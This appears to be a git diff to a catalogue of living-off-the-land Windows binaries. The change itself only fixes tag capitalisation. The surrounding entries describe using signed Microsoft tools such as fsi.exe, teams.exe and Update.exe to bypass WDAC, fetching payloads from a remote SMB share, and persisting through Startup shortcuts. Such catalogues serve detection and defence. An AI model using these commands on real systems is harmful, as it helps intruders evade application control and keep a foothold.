Full_Path:
|
||||
- Path: 'C:\Program Files\dotnet\dotnet.exe'
|
||||
Detection:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: Fsharp
|
||||
- Execute: FSharp
|
||||
- Command: fsi.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: Fsharp
|
||||
- Execute: FSharp
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\dotnet\sdk\<version>\FSharp\fsi.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: Fsharp
|
||||
- Execute: FSharp
|
||||
- Command: fsianycpu.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: Fsharp
|
||||
- Execute: FSharp
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
|
||||
Code_Sample:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: CSharp
|
||||
- Command: rcsi.exe bypass.csx
|
||||
Description: Use embedded C# within the csx script to execute the code.
|
||||
Usecase: Local execution of arbitrary C# code stored in local CSX file.
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: CSharp
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Code_Sample:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
|
||||
- Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
|
||||
Code_Sample:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: Javascript
|
||||
- Execute: Node.JS
|
||||
- Command: teams.exe
|
||||
Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing.
|
||||
Usecase: Execute JavaScript code
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: Javascript
|
||||
- Execute: Node.JS
|
||||
- Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
|
||||
Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command
|
||||
Usecase: Executes a process under a trusted Microsoft signed binary
|
||||
|
||||
@ -79,7 +79,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: CMD
|
||||
- Execute: Remote
|
||||
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||
@ -109,7 +109,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: Update.exe --createShortcut=payload.exe -l=Startup
|
||||
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
|
||||
Usecase: Execute binary
|
||||
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
|
||||
Detection:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: XOML
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
|
||||
Code_Sample:
|
||||
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: wsl.exe --exec bash -c "<command>"
|
||||
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
|
||||
Usecase: Performs execution of arbitrary Linux commands.
|
||||
|
||||
Loading…
Reference in New Issue
Block a user